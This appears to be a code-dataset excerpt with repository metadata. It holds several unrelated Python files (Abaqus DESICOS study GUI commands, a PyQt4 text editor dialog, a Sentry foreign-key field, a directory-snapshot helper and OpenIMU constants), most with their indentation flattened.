] | 1 | 2020-10-09T12:42:02.000Z | 2020-10-09T12:42:02.000Z | desicos/abaqus/gui/gui_commands.py | saullocastro/desicos | 922db8ac4fb0fb4d09df18ce2a14011f207f6fa8 | [
"BSD-3-Clause"
] | 2 | 2020-07-14T07:45:31.000Z | 2020-12-29T00:22:41.000Z | import os
import subprocess
import shutil
from itertools import chain
import __main__
import numpy as np
import desicos.abaqus.abaqus_functions as abaqus_functions
import desicos.conecylDB as conecylDB
import desicos.abaqus.conecyl as conecyl
import desicos.abaqus.study as study
from desicos.abaqus.constants import TMP_DIR
from desicos.conecylDB import fetch, save
ccattrs = ['rbot','H','alphadeg','plyts',
'stack', 'numel_r', 'elem_type',
'separate_load_steps', 'displ_controlled',
'axial_displ', 'axial_load', 'axial_step',
'pressure_load', 'pressure_step',
#'Nxxtop', 'Nxxtop_vec',
'damping_factor1', 'minInc1', 'initialInc1', 'maxInc1', 'maxNumInc1',
'damping_factor2', 'minInc2', 'initialInc2', 'maxInc2', 'maxNumInc2',
'bc_fix_bottom_uR', 'bc_fix_bottom_v', 'bc_bottom_clamped',
'bc_fix_bottom_side_uR', 'bc_fix_bottom_side_v', 'bc_fix_bottom_side_u3',
'bc_fix_top_uR', 'bc_fix_top_v', 'bc_top_clamped',
'bc_fix_top_side_uR', 'bc_fix_top_side_v', 'bc_fix_top_side_u3',
'resin_add_BIR', 'resin_add_BOR', 'resin_add_TIR', 'resin_add_TOR',
'use_DLR_bc',
'resin_E', 'resin_nu', 'resin_numel',
'resin_bot_h', 'resin_bir_w1', 'resin_bir_w2', 'resin_bor_w1', 'resin_bor_w2',
'resin_top_h', 'resin_tir_w1', 'resin_tir_w2', 'resin_tor_w1', 'resin_tor_w2',
'laminapropKeys', 'allowables', 'timeInterval', 'stress_output']
def find_std_name(std_name):
#
#TODO: avoid using try and except... how to find if .stds exists inside
# __main__
try:
if std_name in __main__.stds.keys():
pass
except:
__main__.stds = {}
return std_name
def command_wrapper(cmd):
# Decorator function to provide error tracebacks from commands
def new_cmd(*args, **kwargs):
try:
cmd(*args, **kwargs)
except Exception, e:
import traceback
traceback.print_exc()
raise
return new_cmd
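# Usage note: decorating GUI-invoked commands (as done for the apply_imp_*
# and other commands below) makes exceptions print a full traceback to the
# console instead of being silently swallowed by the Abaqus GUI.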
@command_wrapper
def apply_imp_ms(
std_name,
imp_ms,
imp_ms_stretch_H,
imp_ms_scalings,
imp_r_TOL,
imp_ms_ncp,
imp_ms_power_parameter,
imp_ms_theta_z_format,
imp_ms_rotatedeg,
):
std = __main__.stds[std_name]
start = 0
if std.calc_Pcr:
start = 1
# The nodal_translations stores the first search to save time
# it starts with None
nodal_translations = None
for i, scaling_factor in enumerate(imp_ms_scalings):
scaling_factor = scaling_factor[0]
if scaling_factor:
cc = std.ccs[i+start]
msi = cc.impconf.add_msi(
imp_ms=imp_ms,
scaling_factor=scaling_factor,
rotatedeg=imp_ms_rotatedeg,
)
cc.impconf.rebuild()
msi.stretch_H = imp_ms_stretch_H
msi.use_theta_z_format = imp_ms_theta_z_format
msi.r_TOL = imp_r_TOL
msi.ncp = imp_ms_ncp
msi.power_parameter = imp_ms_power_parameter
msi.nodal_translations = nodal_translations
nodal_translations = msi.create()
@command_wrapper
def apply_imp_t(
std_name,
imp_thick,
imp_num_sets,
imp_t_stretch_H,
imp_t_scalings,
imp_t_ncp,
imp_t_power_parameter,
imp_t_theta_z_format,
imp_t_rotatedeg):
std = __main__.stds[std_name]
start = 0
if std.calc_Pcr:
start = 1
# The nodal_translations stores the first search to save time
# it starts with None
elems_t = None
t_set = None
for i,scaling_factor in enumerate(imp_t_scalings):
scaling_factor = scaling_factor[0]
if scaling_factor:
cc = std.ccs[i+start]
ti = cc.impconf.add_ti(imp_thick, scaling_factor)
cc.impconf.rebuild()
ti.number_of_sets = imp_num_sets
ti.stretch_H = imp_t_stretch_H
ti.use_theta_z_format = imp_t_theta_z_format
ti.ncp = imp_t_ncp
ti.power_parameter = imp_t_power_parameter
ti.elems_t = elems_t
ti.t_set = t_set
elems_t, t_set = ti.create()
def create_study(**kwargs):
# setting defaults
pl_table = kwargs.get('pl_table')
cb_table = kwargs.get('cb_table')
pload_step = kwargs.get('pload_step')
d_table = kwargs.get('d_table')
ax_table = kwargs.get('ax_table')
lbmi_table = kwargs.get('lbmi_table')
cut_table = kwargs.get('cut_table')
ppi_enabled = kwargs.get('ppi_enabled')
ppi_extra_height = kwargs.get('ppi_extra_height')
ppi_table = kwargs.get('ppi_table')
ffi_scalings = kwargs.get('ffi_scalings')
while len(ffi_scalings) > 0 and ffi_scalings[-1] in [(0, False), False]:
ffi_scalings = ffi_scalings[:-1]
betadeg = kwargs.get('betadeg', 0.)
omegadeg = kwargs.get('omegadeg', 0.)
betadegs = kwargs.get('betadegs')
omegadegs = kwargs.get('omegadegs')
imp_num = {}
imp_num['pl'] = kwargs.get('pl_num')
imp_num['cbi'] = kwargs.get('cb_num')
imp_num['d'] = kwargs.get('d_num')
imp_num['ax'] = kwargs.get('ax_num')
imp_num['lbmi'] = kwargs.get('lbmi_num')
imp_num['cut'] = kwargs.get('cut_num')
imp_tables = {}
imp_tables['pl'] = pl_table
imp_tables['cbi'] = cb_table
imp_tables['d'] = d_table
imp_tables['ax'] = ax_table
imp_tables['lbmi'] = lbmi_table
imp_tables['cut'] = cut_table
num_params = {}
num_params['pl'] = 2
num_params['cbi'] = 2
num_params['d'] = 4
num_params['ax'] = 2
num_params['lbmi'] = 1
num_params['cut'] = 3
num_models = 1
for k in ['pl', 'cbi', 'd', 'ax', 'lbmi', 'cut']:
if imp_num[k] == 0:
continue
imp_table = imp_tables[k]
num_models = max(num_models, len(imp_table)-(num_params[k]+1))
num_models = max(num_models, len(ffi_scalings))
#
# Cleaning up input values
#
# laminate
laminate = np.atleast_2d([i for i in kwargs.get('laminate') if i])
kwargs['laminate'] = laminate
kwargs['stack'] = [float(i) for i in laminate[:,2] if i != '']
stack = kwargs['stack']
kwargs['laminapropKeys'] = [i if i != '' else laminate[0,0]
for i in laminate[:len(stack),0]]
kwargs['plyts'] = [float(i) if i != '' else float(laminate[0,1])
for i in laminate[:len(stack),1]]
#TODO currently only one allowable is allowed for stress analysis
kwargs['allowables'] = [kwargs['allowables'] for _ in stack]
#allowablesKeys = [float(i) if i != '' else laminate[0,3] \
# for i in laminate[:len(stack),1]]
#
# load asymmetry
#
#TODO list comprehension for these guys below
la = kwargs.get('la')
if la == 0:
betadegs = []
omegadegs = []
elif la == 1:
betadegs = [betadeg for i in range(num_models)]
omegadegs = [omegadeg for i in range(num_models)]
elif la == 2:
if betadegs is not None:
new_betadegs = []
for betadeg in betadegs:
if betadeg:
new_betadegs.append(betadeg[0])
betadegs = new_betadegs
else:
betadegs = []
if omegadegs is not None:
new_omegadegs = []
for omegadeg in omegadegs:
if omegadeg:
new_omegadegs.append(omegadeg[0])
omegadegs = new_omegadegs
else:
omegadegs = []
num_models = max(num_models, len(betadegs), len(omegadegs))
#
# damping
#
if not kwargs['artificial_damping1']:
kwargs['damping_factor1'] = None
if not kwargs['artificial_damping2']:
kwargs['damping_factor2'] = None
#
std_name = find_std_name(kwargs.get('std_name'))
#
dirname = os.path.join(TMP_DIR, std_name, 'outputs')
if not os.path.isdir(dirname):
os.makedirs(dirname)
#
#
std = study.Study()
__main__.stds[std_name] = std
std.name = std_name
std.rebuild()
for cc in std.ccs:
cc.rebuilt = False
cc.created_model = False
for i in range(1, num_models+1):
cc = conecyl.ConeCyl()
for attr in ccattrs:
setattr(cc, attr, kwargs[attr])
# adding load asymmetry
i_model = i-1
if i_model < len(betadegs):
cc.betadeg = betadegs[i_model]
if i_model < len(omegadegs):
cc.omegadeg = omegadegs[i_model]
# adding perturbation loads
i_model = i + num_params['pl']
if i_model < len(pl_table):
for j in range(imp_num['pl']):
theta = pl_table[0][j]
pt = pl_table[1][j]
pltotal = pl_table[i_model][j]
cc.impconf.add_pload(theta, pt, pltotal, step=pload_step)
#Adding constant buckle
i_model = i + num_params['cbi']
if i_model < len(cb_table):
for j in range(imp_num['cbi']):
theta = cb_table[0][j]
pt = cb_table[1][j]
cbtotal = cb_table[i_model][j]
cc.impconf.add_cb(theta, pt, cbtotal, step=pload_step)
# adding single buckles
i_model = i + num_params['d']
if i_model < len(d_table):
for j in range(imp_num['d']):
theta0 = d_table[0][j]
z0 = d_table[1][j]
a = d_table[2][j]
b = d_table[3][j]
wb = d_table[i_model][j]
cc.impconf.add_dimple(theta0, z0, a, b, wb)
# adding axisymmetrics
i_model = i + num_params['ax']
if i_model < len(ax_table):
for j in range(imp_num['ax']):
z0 = ax_table[0][j]
b = ax_table[1][j]
wb = ax_table[i_model][j]
cc.impconf.add_axisymmetric(z0, b, wb)
# adding linear buckling mode-shaped imperfections
i_model = i + num_params['lbmi']
if i_model < len(lbmi_table):
for j in range(imp_num['lbmi']):
mode = lbmi_table[0][j]
scaling_factor = lbmi_table[i_model][j]
cc.impconf.add_lbmi(mode, scaling_factor)
# adding cutouts
i_model = i + num_params['cut']
if i_model < len(cut_table):
for j in range(imp_num['cut']):
theta = cut_table[0][j]
pt = cut_table[1][j]
numel = cut_table[2][j]
d = cut_table[i_model][j]
cutout = cc.impconf.add_cutout(theta, pt, d,
numel_radial_edge=numel)
## adding ply piece imperfection
if ppi_enabled:
info = []
for row in ppi_table:
if row is False:
continue # False may be appended if there is only one row
keys = ['starting_position', 'rel_ang_offset', 'max_width', 'eccentricity']
try:
info.append(dict((key, float(row[i])) for i, key in enumerate(keys) if row[i] != ''))
except ValueError, e:
raise ValueError('Invalid non-numeric value in Ply Piece Imperfection table:' + e.message.split(':')[-1])
cc.impconf.add_ppi(info, ppi_extra_height)
# adding fiber fraction imperfection
i_model = i-1
if i_model < len(ffi_scalings):
global_sf, use_ti = ffi_scalings[i_model]
if global_sf == 0:
global_sf = None
if use_ti or (global_sf is not None):
cc.impconf.add_ffi(nominal_vf=kwargs['ffi_nominal_vf'],
E_matrix=kwargs['ffi_E_matrix'],
nu_matrix=kwargs['ffi_nu_matrix'],
use_ti=use_ti,
global_sf=global_sf)
std.add_cc(cc)
std.create_models(write_input_files=False)
def run_study(std_name, ncpus, use_job_stopper):
args = ['abaqus', 'python']
args.append(os.path.join(TMP_DIR, std_name,
'run_' + std_name + '.py'))
args.append('cpus={0:d}'.format(ncpus))
args.append('gui')
if use_job_stopper:
args.append('use_stopper')
run_cmd = ' '.join(args)
subprocess.Popen(run_cmd, shell=True)
def clean_output_folder(std_name):
stds = __main__.stds
if not std_name in stds.keys():
print('Study has not been created!')
print('')
return
std = stds[std_name]
cwd = os.getcwd()
os.chdir(std.output_dir)
try:
if os.name == 'nt':
os.system('move *.gaps ..')
os.system('del /q *.*')
os.system('move ..\*.gaps .')
else:
os.system('mv *.gaps ..')
os.system('rm *.*')
            os.system('mv ../*.gaps .')
except:
pass
os.chdir(cwd)
def save_study(std_name, params_from_gui):
stds = __main__.stds
if not std_name in stds.keys():
print('Study has not been created!')
print(' ')
return
std = stds[std_name]
std.params_from_gui = params_from_gui
std.save()
if not os.path.isdir(TMP_DIR):
os.makedirs(TMP_DIR)
os.chdir(TMP_DIR)
__main__.mdb.saveAs(pathName = std_name + '.cae')
print(r'The DESICOS study has been saved to "{0}.study".'.format(
os.path.join(std.tmp_dir, std_name)))
print(' ')
def load_study(std_name):
std = study.Study()
std.tmp_dir = TMP_DIR
std.name = std_name
std = std.load()
std_name = find_std_name(std_name)
__main__.stds[std_name] = std
__main__.openMdb(pathName = std_name + '.cae')
vpname = __main__.session.currentViewportName
__main__.session.viewports[vpname].setValues(displayedObject = None)
mdb = __main__.mdb
if std.ccs[0].model_name in mdb.models.keys():
mod = mdb.models[std.ccs[0].model_name]
p = mod.parts['Shell']
__main__.session.viewports[vpname].setValues(displayedObject = p)
a = mod.rootAssembly
a.regenerate()
for cc in std.ccs:
if not cc.model_name in mdb.models.keys():
print('Could not load objects for model {0}!'.format(
cc.model_name))
continue
abaqus_functions.set_colors_ti(cc)
def get_new_key(which, key, value):
# Given a DB key and value
# Check whether value is already in the DB, if not add it
# and return a key that can be used to reference to 'value'
value = tuple(value) # Convert list to tuple, if needed
existing = fetch(which)
# Inverse mapping. Sorting keeps result reliable if there are duplicated values.
inv_existing = dict((v, k) for k, v in sorted(existing.iteritems(), reverse=True))
if key in existing and existing[key] == value:
# Key already exists and with the correct value, reuse it
return key
if value in inv_existing:
# There is already a name for this value in the DB, use it
return str(inv_existing[value])
# Find a new (not yet used) name and save in the DB
new_key = key
i = 1
while new_key in existing:
new_key = '{0}_{1:04d}'.format(key, i)
i += 1
save(which, new_key, value)
return new_key
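# Illustrative behavior of get_new_key (hypothetical values; assume the DB
# already maps 'steel' -> (210e3, 0.3)):
#   get_new_key('laminaprops', 'steel', (210e3, 0.3))  -> 'steel' (key reused)
#   get_new_key('laminaprops', 'alu', (210e3, 0.3))    -> 'steel' (existing name for this value)
#   get_new_key('laminaprops', 'steel', (70e3, 0.33))  -> 'steel_0001' (new entry saved)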
def reconstruct_params_from_gui(std):
# First cc is often a linear one, so use the last cc as 'template'
# XX - it is assumed that all other ccs use the same parameters
cc = std.ccs[-1]
params = {}
for attr in ccattrs:
if attr in ('laminapropKeys', 'allowables', 'stack', 'plyts',
'damping_factor1', 'damping_factor2'):
continue
value = getattr(cc, attr)
params[attr] = value
# Set artificial_dampingX and damping_factorX manually
damping_attrs = [('damping_factor1', 'artificial_damping1'),
('damping_factor2', 'artificial_damping2')]
for damp_attr, art_attr in damping_attrs:
value = getattr(cc, damp_attr)
params[damp_attr] = value if (value is not None) else 0.
params[art_attr] = value is not None
# Prevent the GUI from complaining about unset parameters
for attr in ('axial_load', 'axial_displ', 'pressure_load'):
if params[attr] is None:
params[attr] = 0
# Set laminate properties
if not (len(cc.laminaprops) == len(cc.stack) == len(cc.plyts) ==
len(cc.laminapropKeys)):
raise ValueError('Loaded ConeCyl object has inconsistent stack length!')
laminapropKeys = []
for key, value in zip(cc.laminapropKeys, cc.laminaprops):
laminapropKeys.append(get_new_key('laminaprops', key, value))
params['laminapropKey'] = laminapropKeys[0]
# allowableKey is not saved, so reuse laminapropKey for the name
# TODO: Per-ply allowables
params['allowablesKey'] = get_new_key('allowables',
cc.laminapropKeys[0], cc.allowables[0])
# Construct laminate table
# import here to avoid circular reference
from testDB import NUM_PLIES, MAX_MODELS
tmp = np.empty((NUM_PLIES, 3), dtype='|S50')
tmp.fill('')
tmp[:len(laminapropKeys),0] = laminapropKeys
tmp[:len(cc.plyts),1] = cc.plyts
tmp[:len(cc.stack),2] = cc.stack
params['laminate'] = ','.join(['('+','.join(i)+')' for i in tmp])
# Apply perturbation loads
# TODO: other imperfections
all_ploads = list(chain.from_iterable(cci.impconf.ploads for cci in std.ccs))
all_ploads = map(lambda pl: (pl.thetadeg, pl.pt), all_ploads)
# Filter duplicates, to obtain a list of unique pload parameter combinations
seen = set()
all_ploads = [x for x in all_ploads if not (x in seen or seen.add(x))]
params['pl_num'] = len(all_ploads)
nonlinear_ccs = filter(lambda cci: not cci.linear_buckling, std.ccs)
# TODO: unduplicate magic numbers (here, in create_study and in testDB)
# It'll only get worse when adding other imperfections as well
if params['pl_num'] > 32:
raise ValueError('Too many different perturbation load parameters')
if len(nonlinear_ccs) > MAX_MODELS:
raise ValueError('Too many different models')
tmp = np.empty((len(nonlinear_ccs) + 3, 32), dtype='|S50')
tmp.fill('')
tmp[0,:len(all_ploads)] = [thetadeg for thetadeg, pt in all_ploads]
tmp[1,:len(all_ploads)] = [pt for thetadeg, pt in all_ploads]
for row, cci in enumerate(nonlinear_ccs, start=3):
for pl in cci.impconf.ploads:
assert (pl.thetadeg, pl.pt) in all_ploads
tmp[row,all_ploads.index((pl.thetadeg, pl.pt))] = pl.pltotal
params['pl_table'] = ','.join(['('+','.join(i)+')' for i in tmp])
# Apply PPI
ppi = cc.impconf.ppi
if ppi is not None:
params['ppi_enabled'] = True
params['ppi_extra_height'] = ppi.extra_height
tmp = np.empty((len(ppi.info), 4), dtype='|S50')
keys = ['starting_position', 'rel_ang_offset', 'max_width', 'eccentricity']
for i, info_dict in enumerate(ppi.info):
tmp[i,:] = [str(info_dict.get(key, '')) for key in keys]
params['ppi_table'] = ','.join(['('+','.join(i)+')' for i in tmp])
else:
params['ppi_table'] = ''
# Apply FFI
ffi = cc.impconf.ffi
if ffi is not None:
params['ffi_nominal_vf'] = ffi.nominal_vf
params['ffi_E_matrix'] = ffi.E_matrix
params['ffi_nu_matrix'] = ffi.nu_matrix
ffi_scalings = []
for cci in nonlinear_ccs:
ffi = cci.impconf.ffi
if ffi is None:
ffi_scalings.append((0, False))
else:
sf = ffi.global_sf if ffi.global_sf is not None else 0
ffi_scalings.append((sf, ffi.use_ti))
params['ffi_scalings'] = ','.join(str(s) for s in ffi_scalings)
else:
params['ffi_scalings'] = ''
# MSI, TI
for imp_type in ('ms', 't'):
imps = getattr(cc.impconf, imp_type + 'is')
if len(imps) == 0:
params['imp_{0}_scalings'.format(imp_type)] = ''
continue
imp = imps[0]
params['imp_{0}_theta_z_format'.format(imp_type)] = imp.use_theta_z_format
params['imp_{0}_stretch_H'.format(imp_type)] = imp.stretch_H
params['imp_{0}_ncp'.format(imp_type)] = imp.ncp
params['imp_{0}_power_parameter'.format(imp_type)] = imp.power_parameter
# rotatedeg seems not yet implemented in GUI ?!
# params['imp_{0}_rotatedeg'.format(imp_type)] = imp.rotatedeg
name_attr = 'imp_ms' if imp_type == 'ms' else 'imp_thick'
params[name_attr] = getattr(imp, name_attr)
if imp_type == 'ms':
params['imp_r_TOL'] = imp.r_TOL
else:
params['imp_num_sets'] = imp.number_of_sets
# If there are multiple TIs / MSIs, we are out of luck
scalings = []
for cci in nonlinear_ccs:
cci_imps = getattr(cci.impconf, imp_type + 'is')
def filter_imps(impi):
return getattr(impi, name_attr) == getattr(imp, name_attr)
cci_imps = filter(filter_imps, cci_imps)
scalings.append(0 if len(cci_imps) == 0 else cci_imps[0].scaling_factor)
scalings = ','.join(str(s) for s in scalings)
params['imp_{0}_scalings'.format(imp_type)] = scalings
params['std_name'] = std.name
std.params_from_gui = params
def load_study_gui(std_name, form):
std = study.Study()
std.tmp_dir = TMP_DIR
std.name = std_name
std = std.load()
saved_from_gui = len(std.params_from_gui) != 0
if not saved_from_gui:
reconstruct_params_from_gui(std)
form.setDefault()
form.read_params_from_gui(std.params_from_gui)
return saved_from_gui
| 36.96796 | 125 | 0.593194 | 2,978 | 21,922 | 4.121894 | 0.156145 | 0.02224 | 0.011405 | 0.008065 | 0.217352 | 0.154542 | 0.11609 | 0.075275 | 0.060448 | 0.051976 | 0 | 0.009255 | 0.290211 | 21,922 | 592 | 126 | 37.030405 | 0.779627 | 0.099033 | 0 | 0.166667 | 0 | 0 | 0.114312 | 0.00442 | 0.006173 | 0 | 0 | 0.001689 | 0.002058 | 0 | null | null | 0.004115 | 0.028807 | null | null | 0.016461 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3230aebfb6ec10341841fb4d94700228d875338 | 2,277 | py | Python | pydeelib/widgets/texteditor.py | pombreda/pydee | 133609d4e378361d968e7a06baa11256e0e2f403 | [
"MIT"
] | null | null | null | pydeelib/widgets/texteditor.py | pombreda/pydee | 133609d4e378361d968e7a06baa11256e0e2f403 | [
"MIT"
] | null | null | null | pydeelib/widgets/texteditor.py | pombreda/pydee | 133609d4e378361d968e7a06baa11256e0e2f403 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Copyright © 2009 Pierre Raybaut
# Licensed under the terms of the MIT License
# (see pydeelib/__init__.py for details)
"""
Text Editor Dialog based on PyQt4
"""
# pylint: disable-msg=C0103
# pylint: disable-msg=R0903
# pylint: disable-msg=R0911
# pylint: disable-msg=R0201
from PyQt4.QtCore import Qt
from PyQt4.QtCore import SIGNAL, SLOT
from PyQt4.QtGui import QVBoxLayout, QTextEdit, QDialog, QDialogButtonBox
# Local import
from pydeelib.config import get_icon, get_font
class TextEditor(QDialog):
"""Array Editor Dialog"""
def __init__(self, text, title='', font=None, parent=None):
super(TextEditor, self).__init__(parent)
self.layout = QVBoxLayout()
self.setLayout(self.layout)
# Text edit
self.edit = QTextEdit(parent)
self.edit.setPlainText(text)
if font is None:
font = get_font('texteditor')
self.edit.setFont(font)
self.layout.addWidget(self.edit)
# Buttons configuration
bbox = QDialogButtonBox(QDialogButtonBox.Ok | QDialogButtonBox.Cancel )
self.connect(bbox, SIGNAL("accepted()"), SLOT("accept()"))
self.connect(bbox, SIGNAL("rejected()"), SLOT("reject()"))
self.layout.addWidget(bbox)
# Make the dialog act as a window
self.setWindowFlags(Qt.Window)
self.setWindowIcon(get_icon('edit.png'))
self.setWindowTitle(self.tr("Text editor") + \
"%s" % (" - "+str(title) if str(title) else ""))
self.resize(400, 300)
def get_copy(self):
"""Return modified text"""
return unicode(self.edit.toPlainText())
def main():
"""Text editor demo"""
from PyQt4.QtGui import QApplication
QApplication([])
dialog = TextEditor("""
01234567890123456789012345678901234567890123456789012345678901234567890123456789
dedekdh elkd ezd ekjd lekdj elkdfjelfjk e
""")
if dialog.exec_():
text = dialog.get_copy()
print "Accepted:", text
dialog = TextEditor(text)
dialog.exec_()
else:
print "Canceled"
if __name__ == "__main__":
main() | 29.960526 | 85 | 0.611331 | 242 | 2,277 | 5.640496 | 0.466942 | 0.029304 | 0.046886 | 0.030769 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.067674 | 0.273166 | 2,277 | 76 | 86 | 29.960526 | 0.756495 | 0.139218 | 0 | 0 | 0 | 0 | 0.131399 | 0.045506 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.119048 | null | null | 0.047619 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3256dbf7b293bf8be691bd30c05059ca559be89 | 685 | py | Python | src/sentry/db/models/fields/foreignkey.py | withrocks/commonlims | d8a925c917aa26e8205fefb3966a9f49f8f2e2f8 | [
"BSD-3-Clause"
] | 4 | 2019-05-27T13:55:07.000Z | 2021-03-30T07:05:09.000Z | src/sentry/db/models/fields/foreignkey.py | withrocks/commonlims | d8a925c917aa26e8205fefb3966a9f49f8f2e2f8 | [
"BSD-3-Clause"
] | 99 | 2019-05-20T14:16:33.000Z | 2021-01-19T09:25:15.000Z | src/sentry/db/models/fields/foreignkey.py | withrocks/commonlims | d8a925c917aa26e8205fefb3966a9f49f8f2e2f8 | [
"BSD-3-Clause"
] | 1 | 2020-08-10T07:55:40.000Z | 2020-08-10T07:55:40.000Z | """
sentry.db.models.fields.foreignkey
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2014 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import
from django.db.models import ForeignKey
__all__ = ('FlexibleForeignKey', )
class FlexibleForeignKey(ForeignKey):
def db_type(self, connection):
# This is required to support BigAutoField (or anything similar)
rel_field = self.target_field
if hasattr(rel_field, 'get_related_db_type'):
return rel_field.get_related_db_type(connection)
return super(FlexibleForeignKey, self).db_type(connection)
| 29.782609 | 75 | 0.70073 | 83 | 685 | 5.53012 | 0.590361 | 0.052288 | 0.061002 | 0.078431 | 0.104575 | 0.104575 | 0 | 0 | 0 | 0 | 0 | 0.014035 | 0.167883 | 685 | 22 | 76 | 31.136364 | 0.791228 | 0.372263 | 0 | 0 | 0 | 0 | 0.087678 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.222222 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
d32a4aebc5975eb5e4c7cdb76bcd29f0483434fb | 3,235 | py | Python | pybond/bond/bond_helpers/observe_files.py | necula01/bond | 7ac262bc9695ba493985c784999509dec979e37a | [
"BSD-2-Clause-FreeBSD"
] | 8 | 2015-11-19T01:14:08.000Z | 2017-06-16T11:21:16.000Z | pybond/bond/bond_helpers/observe_files.py | gnecula/bond | 7ac262bc9695ba493985c784999509dec979e37a | [
"BSD-2-Clause-FreeBSD"
] | 26 | 2015-10-12T21:31:13.000Z | 2017-04-11T13:57:33.000Z | pybond/bond/bond_helpers/observe_files.py | gnecula/bond | 7ac262bc9695ba493985c784999509dec979e37a | [
"BSD-2-Clause-FreeBSD"
] | 3 | 2015-10-30T01:12:10.000Z | 2016-03-26T16:58:17.000Z | # Helper functions to observe files and directories
import os
import re
def collect_directory_contents(directory,
file_filter=None,
collect_file_contents=False):
"""
Collect an object reflecting the contents of a directory
:param directory: the directory where to start the traversal
:param file_filter: either a string representing a regular expression on the name of the files
and directories to be included, or a function that given the directory and the filename
returns true or false, whether the directory or file should be included.
    :param collect_file_contents: indicates whether to collect the contents of files.
        True means to include the contents of all files; a string is treated as a
        regular expression on the relative file name; a function is called with the
        relative file name and should return whether to include that file's contents.
:return: a dictionary with keys corresponding to basename of files and subdirectories.
Only files that are allowed by the file_filter are included.
If the file contents is collected then the dictionary contains a list of lines.
"""
# TODO: figure out a more general form for this, perhaps using
# a configurable visitor to define how to visit each file
result = { } # map from file name to file data.
# file data is either None (if the contents is not spied),
# or an array of lines
# Prepare the file filter
file_filter_func = None
if file_filter:
if isinstance(file_filter, basestring):
file_filter_regexp = re.compile(file_filter)
file_filter_func = lambda rel_file: file_filter_regexp.match(rel_file)
else:
# TODO: assert that it is a function
file_filter_func = file_filter
collect_file_contents_func = None
if collect_file_contents:
        if isinstance(collect_file_contents, bool):
            collect_file_contents_func = lambda rel_file: True
elif isinstance(collect_file_contents, basestring):
include_file_contents_regexp = re.compile(collect_file_contents)
collect_file_contents_func = lambda rel_file: include_file_contents_regexp.match(rel_file)
else:
# TODO: assert that it is a function
collect_file_contents_func = collect_file_contents
def recurse(rel_subdir, result_data):
name_subdir = os.path.join(directory, rel_subdir)
for basename in os.listdir(name_subdir):
rel_file = os.path.join(rel_subdir, basename)
file = os.path.join(directory, rel_file)
if file_filter_func and not file_filter_func(rel_file):
continue
if os.path.isdir(file):
subresult_data = {}
result_data[basename] = subresult_data
recurse(rel_file, subresult_data)
else:
if collect_file_contents_func and collect_file_contents_func(rel_file):
with open(file, 'r') as f:
                        lines = f.readlines()
                        result_data[basename] = [l.rstrip() for l in lines]
else:
result_data[basename] = None
recurse('', result)
return result
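# Illustrative usage sketch (not part of the original module); the path and
# filter below are hypothetical examples. Note the filter must also match
# directory names for the traversal to descend into them.
if __name__ == '__main__':
    tree = collect_directory_contents('/tmp/example',
                                      file_filter=r'[^.]*$|.*\.txt$',
                                      collect_file_contents=True)
    print tree  # e.g. {'sub': {'a.txt': ['line 1', 'line 2']}}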
| 44.930556 | 102 | 0.646677 | 410 | 3,235 | 4.895122 | 0.295122 | 0.101644 | 0.132536 | 0.068759 | 0.149477 | 0.103637 | 0.103637 | 0.103637 | 0.103637 | 0.103637 | 0 | 0 | 0.302628 | 3,235 | 71 | 103 | 45.56338 | 0.889628 | 0.352396 | 0 | 0.139535 | 0 | 0 | 0.000491 | 0 | 0 | 0 | 0 | 0.014085 | 0 | 1 | 0.046512 | false | 0 | 0.046512 | 0 | 0.116279 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d32db38b32c9c1c912fe1cbdd41b39ddaa026dbb | 437 | py | Python | src/aceinna/devices/configs/openimu_predefine.py | LukaszChl/ros_openimu | 1bcf547fa42ee7c7dcc856c1d4eb5702d301b059 | [
"Apache-2.0"
] | 6 | 2021-03-18T16:18:53.000Z | 2022-01-18T15:32:15.000Z | src/aceinna/devices/configs/openimu_predefine.py | LukaszChl/ros_openimu | 1bcf547fa42ee7c7dcc856c1d4eb5702d301b059 | [
"Apache-2.0"
] | 11 | 2020-12-22T16:19:20.000Z | 2022-02-11T11:03:25.000Z | src/aceinna/devices/configs/openimu_predefine.py | LukaszChl/ros_openimu | 1bcf547fa42ee7c7dcc856c1d4eb5702d301b059 | [
"Apache-2.0"
] | 11 | 2021-04-12T03:00:28.000Z | 2022-03-25T19:53:43.000Z | """
predefined params for openimu
"""
JSON_FILE_NAME = 'openimu.json'
def get_app_names():
'''
define openimu app type
'''
app_names = ['Compass',
'IMU',
'INS',
'Leveler',
'OpenIMU',
'VG',
'VG_AHRS',
]
return app_names
APP_STR = ['INS', 'VG', 'VG_AHRS', 'Compass', 'Leveler', 'IMU', 'OpenIMU']
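# Illustrative sketch (not part of the original module): a caller might
# validate a user-supplied app name against the predefined list, e.g.
#
#     if app_name not in get_app_names():
#         raise ValueError('unknown OpenIMU app: {0}'.format(app_name))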
